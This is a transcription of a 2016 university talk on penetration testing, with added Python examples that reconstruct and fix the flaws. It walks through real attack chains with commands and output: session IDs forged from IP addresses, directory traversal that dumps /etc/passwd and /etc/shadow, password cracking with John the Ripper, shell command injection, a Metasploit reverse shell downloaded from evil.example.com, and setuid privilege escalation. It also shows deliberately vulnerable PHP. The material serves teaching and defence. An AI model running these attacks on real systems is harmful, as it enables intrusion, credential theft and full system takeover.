Penetration Tester - Click Monkey or Creative Hacker
Transcription
Penetration Tester — Click Monkey or Creative Hacker?
Sebastian Chrobak - RedTeam Pentesting GmbH
sebastian.chrobak@redteam-pentesting.de
https://www.redteam-pentesting.de/
Security Lab 2016, Research Group IT-Security, RWTH Aachen University, 10 May 2016

Dates & Facts
- Founded in 2004 at RWTH Aachen
- 11 penetration testers, always 3 in a team
- Conducting penetration tests worldwide
- IT security research
- Specialised exclusively on penetration tests
→ Attacking a network or product with the owner's consent

What is a pentest?
- Way to test the security of an IT system
- Conducting a controlled attack
- Offensive techniques to discover real vulnerabilities
→ Slip into the role of a real attacker

What can be tested?
Today, nearly everything!
- Web applications, apps
- (Internal) company networks
... and what else?
- Home automation systems
- Technical devices everyone knows/has

What's up today?
- How to approach objectives to be tested?
- How to identify vulnerabilities?
- Which tools can be used to exploit them?
- What are the impacts?
→ Based on real-world examples!

Random session IDs
Random session IDs of a website:
  TvWjLeJjGhPvAhJjNgBuPiFkRqJmHOL
Or just random at first glance?
  TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL
  TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
  TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL

How much randomness is really in there?
- Every second character is uppercase
- Only one character changed for three session IDs
- Requests from different IP addresses:
  From 192.168.1.23: TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL
  From 10.100.1.42:  TvWjLdBhGbHvAhJlMgBuPiFkRtJmHOL

Reversing the randomness
"Secret" key: dahfbhvagjhk
192.168.1.23 = 192168001023 (every octet zero-padded to three digits)
Each key letter is shifted forward in the alphabet by the matching digit of the padded address; the result is then written with every second character in uppercase:
  dahfbhvagjhk
  192168001023
  ------------
  ejjghpvahjjn = eJjGhPvAhJjN
That block sits at characters 6 to 17 of the session ID:
  TvWjL[eJjGhPvAhJjN]gBuPiFkRsJmHOL

Summary
- No random session IDs are generated
- Session IDs derivable from IP address
→ Access application on behalf of other users
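The reversal above, written out as code. This is an added example, not code from the talk or from RedTeam Pentesting; the key, the zero-padding of the address and the alternating case are taken from the slides, while the constant prefix, middle part and suffix of the ID (and the idea that the one changing character is a counter) are assumptions I made by lining up the sample IDs shown. Given that layout, the same routine that recovers the client address from an ID can also forge the ID of another client.

```python
"""Reconstructing the session-ID scheme from the talk's samples."""

# Observed on the slides: the "secret" key and how the IP is zero-padded.
KEY = "dahfbhvagjhk"

# Layout assumed for this example from the sample IDs: constant prefix,
# 12-character IP-derived block, constant middle, one-character counter,
# constant suffix. The talk only shows that the IP block starts at offset 5.
PREFIX, MIDDLE, SUFFIX = "TvWjL", "gBuPiFkR", "JmHOL"
IP_OFFSET = len(PREFIX)


def zero_pad_ip(ip: str) -> str:
    """'192.168.1.23' -> '192168001023': each octet padded to three digits."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip!r}")
    return "".join(f"{int(o):03d}" for o in octets)


def alternate_case(s: str) -> str:
    """Every second character uppercase, as observed in the IDs."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(s))


def ip_block(ip: str, key: str = KEY) -> str:
    """Shift each key letter forward by the matching digit of the padded IP."""
    shifted = "".join(
        chr((ord(k) - ord("a") + int(d)) % 26 + ord("a"))
        for k, d in zip(key, zero_pad_ip(ip))
    )
    return alternate_case(shifted)


def session_id_for(ip: str, counter: str) -> str:
    """Forge the ID a client at `ip` holds for a given counter character."""
    return PREFIX + ip_block(ip) + MIDDLE + counter + SUFFIX


def recover_ip(session_id: str, key: str = KEY) -> str:
    """Invert ip_block(): digit = (ID letter - key letter) mod 26."""
    block = session_id[IP_OFFSET:IP_OFFSET + len(key)].lower()
    digits = []
    for c, k in zip(block, key):
        d = (ord(c) - ord(k)) % 26
        if d > 9:
            raise ValueError("block does not decode to digits: wrong key or layout")
        digits.append(str(d))
    padded = "".join(digits)
    return ".".join(str(int(padded[i:i + 3])) for i in range(0, 12, 3))


def varying_positions(ids: list[str]) -> list[int]:
    """Which character positions actually change across a set of observed IDs?"""
    length = len(ids[0])
    return [i for i in range(length) if len({sid[i] for sid in ids}) > 1]


if __name__ == "__main__":
    # IDs taken from the slides: three consecutive IDs seen from 192.168.1.23
    observed = [
        "TvWjLeJjGhPvAhJjNgBuPiFkRrJmHOL",
        "TvWjLeJjGhPvAhJjNgBuPiFkRsJmHOL",
        "TvWjLeJjGhPvAhJjNgBuPiFkRtJmHOL",
    ]
    print("positions that vary:", varying_positions(observed))
    print("IP behind the IDs:", recover_ip(observed[0]))
    print("forged ID for 10.100.1.42:", session_id_for("10.100.1.42", "t"))
```

`varying_positions()` is the quick check worth running on any batch of tokens before trusting them: of 31 characters, exactly one position changes between consecutive IDs here, which is the first sign that there is no randomness to speak of.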
Image retrieval system
  <img src="/medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200"/>
Changing the file name in the path:
  <img src="/medias/redteam.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" alt="[...]" width="200"/>
→ Image remains the same

Wait, what's that URL parameter for?
Maybe it is base64 encoded?
  $ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" | base64 -d
  master|root|12345|image/jpeg|7415687361172.jpg|e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
- The last field is a SHA-256 hash referencing a particular version of the file
- It can be replaced by a dash ("-") to get the latest version:
  master|root|12345|image/jpeg|7415687361172.jpg|-

Changing the filename
  $ echo -n "master|root|12345|text/plain|../../../../../../etc/passwd|-" | base64 -w0
  bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0=
(-w0 disables line wrapping in GNU base64; the trailing "=" padding is simply dropped in the URL below.)

Changing the filename & accessing arbitrary files
  $ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  bin:x:2:2:bin:/bin:/bin/sh
  [...]

What about /etc/shadow?
  $ curl http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93fC0
  root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999: [...]
  seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1:16929:0:9999
  itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.:16929:0:99999
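The context parameter handling from the slides above, as an added example that is neither the talk's nor the affected product's code: decoding the parameter (with the "=" padding the URL dropped), rebuilding it with a traversal file name, and the check the server should have performed before touching the filesystem. The field names are labels I chose, the talk does not name the six fields; the media root directory is likewise assumed.

```python
"""The context parameter: decode, forge, and the check the server should have made."""
import base64
import posixpath
import re
from typing import Optional

SEP = "|"
# Field names are my labels for the six '|'-separated values; the talk does
# not name them. Only the MIME type, file name and version matter here.
FIELDS = ("catalog", "folder", "id", "mime", "filename", "version")
VERSION_RE = re.compile(r"[0-9a-f]{64}|-")  # SHA-256 hex, or "-" for "latest"

# The context value shown on the slides (URL form, without padding).
ORIGINAL_CONTEXT = (
    "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xl"
    "M2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNh"
    "NDk1OTkxYjc4NTJiODU1"
)


def b64decode_lenient(s: str) -> bytes:
    """Decode base64 whose '=' padding was dropped from the URL."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def parse_context(context: str) -> dict:
    parts = b64decode_lenient(context).decode("ascii").split(SEP)
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def build_context(fields: dict) -> str:
    raw = SEP.join(fields[name] for name in FIELDS).encode("ascii")
    return base64.b64encode(raw).decode("ascii")


def resolve_vulnerable(media_root: str, fields: dict) -> str:
    """What the server evidently did: trust the file name exactly as given."""
    return posixpath.normpath(posixpath.join(media_root, fields["filename"]))


def resolve_hardened(media_root: str, fields: dict) -> Optional[str]:
    """Accept only a plain file name that resolves inside media_root."""
    root = posixpath.normpath(media_root)
    name = fields["filename"]
    if name in ("", ".", "..") or name != posixpath.basename(name):
        return None  # contains a '/' or is not a real file name
    if not VERSION_RE.fullmatch(fields["version"]):
        return None  # version must be a SHA-256 hex digest or '-'
    path = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, path]) != root:
        return None  # belt and braces: still below the media root
    return path


if __name__ == "__main__":
    fields = parse_context(ORIGINAL_CONTEXT)
    print(fields)
    evil = dict(fields, mime="text/plain",
                filename="../../../../../../etc/passwd", version="-")
    print(build_context(evil))
    print("vulnerable:", resolve_vulnerable("/var/www/medias", evil))
    print("hardened:  ", resolve_hardened("/var/www/medias", evil))
```

The base name check is the one that matters; the `commonpath` test only catches a mistake in the first check, and the version pattern keeps a later "use the hash as part of a path" from becoming a second injection point.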
Cracking the passwords with John the Ripper
  $ cat users
  root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/
  seclab:$6$FSsCdMlf$.pdmpRa2bmK8CwHQQCIFeRgXNsPTUKgyufj/oEuQgp2RDX7kVUCuSp2onAKIowD81.bCCJcnSxgCb5i175auR1
  itsec:$6$yAmpH0iz$tGOj0CvjHj2GsGltVO.NTddl4.kLeg3fihD8csjhmzQLxmqFXnwbm.hLmLIaa8ZmoszRpFVV.ggFQGhvw8LVO.
  $ john users
  [...]
  Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
  seclab           (seclab)
  toor             (root)
  2g 0:00:00:02 0.45% 2/3 (ETA: 08:17:06) 0.7905g/s 641.5p/s 642.6c/s 642.6C/s bigdog..daisy
Try the harder one using a password list
  $ john users --wordlist=top50000.pwd
  [...]
  Remaining 1 password hash
  secret123        (itsec)
  1g 0:00:00:23 DONE (2016-05-08 08:10) 0.04237g/s 718.6p/s 718.6c/s 718.6C/s switchfoot..clarinet1
  Session completed

Summary
- Content of URL parameter context is not verified
- The file parameter is vulnerable to directory traversal
→ Retrieve arbitrary files from the server's filesystem
- Webserver is started as privileged user (/etc/shadow is readable)
- Using John the Ripper to crack the users' passwords (the passwords were weak!)

Real-world example, really?
Arbitrary file disclosure in SAP hybris Commerce Software Suite might disclose e.g. credit card data.
More details: https://www.redteam-pentesting.de/advisories/rt-sa-2014-016

Backend login form
Administrative backend login form
- Weak default credentials: admin:admin
- Special characters: ; , ' " / % (
→ Command injection?

Verify command injection vulnerability
- Show folder listing: ;ls;
- Print system information: ;uname -a;

What happens in the background?
  <?php
  // Deliberately vulnerable, as shown in the talk: POST values are concatenated
  // into a shell command line without any quoting or validation.
  $login_res = shell_exec(
      'bash check_password.sh ' . $_POST['user'] . ' ' . $_POST['pass']
  );
  ?>
With user=admin;ls; and pass=password the shell receives three commands instead of one:
  $login_res = shell_exec(
      'bash check_password.sh admin;ls; password'
  );

There are some constraints...
- Incoming connections only accepted on port 80
- Port 80 already blocked by the webserver

Don't reinvent the wheel
Create a connect-back shell using Metasploit Framework:
  $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=6.6.6.6 -f elf -o meterpreter
  No platform was selected, choosing Msf::Module::Platform::Linux from the payload
  No Arch selected, selecting Arch: x86 from the payload
  No encoder or badchars specified, outputting raw payload
  Payload size: 71 bytes
  Saved as: meterpreter

Using Metasploit Framework
Starting msfconsole on attacker host:
  $ ./msfconsole
  msf > use exploit/multi/handler
  msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
  [...]
  msf exploit(handler) > exploit
  [*] Started reverse TCP handler on 0.0.0.0:4444
  [*] Starting the payload handler...
Use the command injection vulnerability:
  wget http://evil.example.com/meterpreter
  chmod +x meterpreter
  ./meterpreter
  [*] Transmitting intermediate stager for over-sized stage...
  [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 8.8.8.8:58508) at 2016-05-08 10:30:53 -0400
  meterpreter > shell
  Process 6664 created.
  Channel 1 created.
  $ id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
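The same defect as the PHP above, reproduced and fixed in Python as an added example (not code from the talk): a command line built by concatenation and handed to `sh -c`, next to the quoted form and the argv form that never involves a shell. `check_password.sh` is replaced by a stand-in that only echoes its arguments, an assumption made so the effect of the injected `;` is visible on stdout; the username pattern is likewise my choice.

```python
"""Shell command built by concatenation (the talk's PHP) vs. argument passing."""
import re
import shlex
import subprocess

# Stand-in for the talk's check_password.sh (assumed for this example): it only
# echoes what it was given, so the effect of the injection is visible in stdout.
CHECKER = "echo checking"
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def build_command_vulnerable(user: str, password: str) -> str:
    """Same shape as the PHP: values glued into a string that a shell will parse."""
    return f"{CHECKER} {user} {password}"


def build_command_hardened(user: str, password: str) -> str:
    """If a shell string is unavoidable, quote every value (PHP: escapeshellarg)."""
    return f"{CHECKER} {shlex.quote(user)} {shlex.quote(password)}"


def run_via_shell(command: str) -> str:
    """What shell_exec() does: hand the whole string to /bin/sh."""
    proc = subprocess.run(["sh", "-c", command],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def run_without_shell(user: str, password: str) -> str:
    """Preferred fix: an argv list and no shell, so ';' is just a byte in an argument."""
    proc = subprocess.run(["echo", "checking", user, password],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def username_is_plausible(user: str) -> bool:
    """Input validation on top of, not instead of, proper argument passing."""
    return USERNAME_RE.fullmatch(user) is not None


if __name__ == "__main__":
    payload = "admin;echo INJECTED;"  # the talk used ";ls;" and ";uname -a;"
    print(run_via_shell(build_command_vulnerable(payload, "password")))
    print(run_via_shell(build_command_hardened(payload, "password")))
    print(run_without_shell(payload, "password"))
    print(username_is_plausible(payload))
```

With the vulnerable builder the shell runs `echo INJECTED` as a second command (and tries to run `password` as a third); with quoting or an argv list the whole payload arrives as one harmless argument. Passing credentials on a command line at all is the deeper problem, since they end up visible in the process list.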
How to expand privileges?
Look for executables with setuid bit ("set user ID upon execution")
→ Run executable with permissions of file's owner
  $ find . -user root -perm -4000 -exec ls -al {} \;
  -rwsr-xr-x 1 root root 8008 May  8 10:48 /usr/local/check_update
Sadly, it's not world-writable.
Analysing executables using IDA multi-processor disassembler.

Finally: root access
  $ PROG=id /usr/local/check_update
  Will execute id.
  uid=1000(seclab) gid=1001(seclab) euid=0(root) groups=1001(seclab)
(check_update runs whatever program the PROG environment variable names, and does so with its effective user ID still root.)

Summary
- User-provided input is not escaped
- Dangerous setuid executable found
→ Command execution with root privileges
→ Full compromise of the system
- Endangers all connected (internal) systems

What are the usual suspects?
- Default passwords: admin:admin, root:root
- Broken (management) web apps (WiFi router, switches, CI server)
- Outdated software (e.g. win2000)
- Files on SMB shares accessible: "passwordlist2016.xlsx", "passwordforpasswordlist.txt"
- Missing/broken authorisation
- Certificate verification failures: curl_opt_VERIFY_CERT=0, homebrew trust managers

More examples on our website
- o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials
- AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
- Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
- EntryPass N5200 Credentials Disclosure
https://www.redteam-pentesting.de/advisories/

What does a pentester's day look like?
Regular usage of the software:
- Understand the application's functionality and behaviour → basis for any further exploitation
- Provoke errors, watch for anomalies
Uncover what's happening in the background:
- Analyse the communication, understand how services play together
Identify weaknesses and exploit vulnerabilities:
- Manipulate parameters
- Insert unexpected values
- Change perspectives
- Be creative, use functions differently!
Documentation:
- About 30% of the time of a pentest
Final meeting:
- Discussion of vulnerabilities
- Live demo

But wait, aren't there tools to do this?
- Tools cannot find non-obvious vulnerabilities, especially not the interesting ones!
- Pentesting is handwork!
- But tools ease the exploitation
- Know your toolbox and pick the right one!

This is the end.
Thank you for listening! Any questions?
Next: Open discussion round!